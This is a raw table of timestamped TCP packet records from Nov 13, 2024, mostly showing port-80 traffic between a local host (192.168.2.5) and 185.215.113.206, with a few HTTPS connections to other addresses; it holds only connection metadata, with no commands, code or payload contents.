Nov 13, 2024 20:39:24.496582031 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.496594906 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.496606112 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.496613026 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.496635914 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.496649027 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.527893066 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.527914047 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.527926922 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.527940989 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528011084 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528048992 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528062105 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528068066 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528095961 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528131962 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528243065 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528255939 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528268099 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528281927 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528295040 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528295040 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528332949 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528333902 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528692961 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528723001 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528762102 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528762102 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528847933 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528899908 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528903008 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528935909 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528949022 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.528970957 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.528991938 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.529005051 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.529017925 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.529059887 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.569247961 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.569294930 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.569333076 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.569365978 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.569372892 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.569390059 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.569427013 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.611371040 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.611426115 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.611656904 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.611656904 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.612562895 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.612596989 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.612632036 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.612637043 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.612637043 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.612678051 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.613224983 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.613260031 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.613286972 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.613296032 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.613308907 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.613329887 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.613348961 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.613367081 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.613387108 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.613399982 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.613420963 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.613435984 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.613457918 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.613492966 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.613604069 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.613637924 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.613660097 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.613671064 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.613679886 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.613723993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.620368004 CET	443	49725	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.620551109 CET	443	49725	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.620620966 CET	49725	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.620683908 CET	49725	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.620708942 CET	443	49725	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.620723963 CET	49725	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.620731115 CET	443	49725	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.623577118 CET	49734	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.623625994 CET	443	49734	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.623717070 CET	49734	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.623886108 CET	49734	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.623903036 CET	443	49734	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.644702911 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.644742012 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.644794941 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.644828081 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.644865036 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.644929886 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.644980907 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.645009041 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645015001 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.645009041 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645009041 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645009041 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645009041 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645051956 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.645119905 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645119905 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645121098 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645431995 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.645462036 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.645494938 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645533085 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645576954 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.645610094 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.645632982 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645646095 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.645661116 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645679951 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.645714045 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.645735025 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.686105013 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.686158895 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.686197042 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.686233997 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.686325073 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.686412096 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.686412096 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.727575064 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.727615118 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.727649927 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.727716923 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.727716923 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.729876041 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.729933023 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.729952097 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.729967117 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.729999065 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.730020046 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.730583906 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.730648994 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.730803013 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.730834007 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.730861902 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.730871916 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.730885983 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.730909109 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.730923891 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.730945110 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.730962038 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.730987072 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.731333017 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.731398106 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.731430054 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.731462955 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.731484890 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.731499910 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.731507063 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.731534004 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.731556892 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.731569052 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.731595993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.731604099 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.731621981 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.731643915 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.731650114 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.731679916 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.731703997 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.731724977 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.761688948 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.761744976 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.761780024 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.761836052 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.761836052 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.761837006 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.761888027 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.761910915 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.761910915 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.761924982 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.761935949 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.761959076 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.761993885 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.761996031 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.762013912 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.762058020 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.762445927 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.762480974 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.762509108 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.762516975 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.762532949 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.762572050 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.762628078 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.762662888 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.762686014 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.762706041 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.802839041 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.802876949 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.802911043 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.803009033 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.803009033 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.844604015 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.844652891 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.844687939 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.844804049 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.844804049 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.844804049 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.846834898 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.846872091 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.846903086 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.846909046 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.846930981 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.846972942 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848040104 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848090887 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848098040 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848126888 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848150969 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848162889 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848170996 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848197937 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848211050 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848232985 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848249912 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848269939 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848275900 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848319054 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848489046 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848552942 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848592997 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848625898 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848649025 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848659992 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848689079 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848695040 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.848711014 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.848735094 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.878381968 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.878446102 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.878477097 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.878509998 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.878561020 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.878586054 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.878593922 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.878587008 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.878587008 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.878587008 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.878629923 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.878695965 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.878695965 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.878695965 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.878842115 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.878878117 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.878911972 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.878920078 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.878920078 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.878943920 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.879111052 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.879138947 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.879178047 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.879206896 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.879371881 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.879422903 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.879429102 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.879456997 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.879489899 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.879498005 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.879534006 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.879547119 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.879547119 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.879573107 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.920691013 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.920732975 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.920768023 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.920772076 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.920795918 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.920809984 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.956291914 CET	443	49712	23.1.237.91	192.168.2.5
Nov 13, 2024 20:39:24.956376076 CET	49712	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:24.961674929 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.961709976 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.961740017 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.961745977 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.961765051 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.961787939 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.964030981 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.964060068 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.964087009 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.964113951 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.965197086 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.965229988 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.965255976 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.965265989 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.965281963 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.965300083 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.965306044 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.965339899 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.965353012 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.965387106 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.965399027 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.965420961 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.965424061 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.965465069 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.965738058 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.965770006 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.965791941 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.965804100 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.965806007 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.965840101 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.965852976 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.965879917 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.966141939 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.966173887 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.966197968 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.966212034 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.966216087 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.966250896 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.995786905 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.995843887 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.995866060 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.995882034 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.995893002 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.995923996 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.995935917 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.995973110 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.995981932 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996007919 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996012926 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996045113 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996053934 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996078968 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996102095 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996118069 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996121883 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996165991 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996210098 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996263027 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996263981 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996298075 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996304989 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996336937 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996695042 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996747017 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996747017 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996783972 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996788979 CET	49720	80	192.168.2.5	185.215.113.206
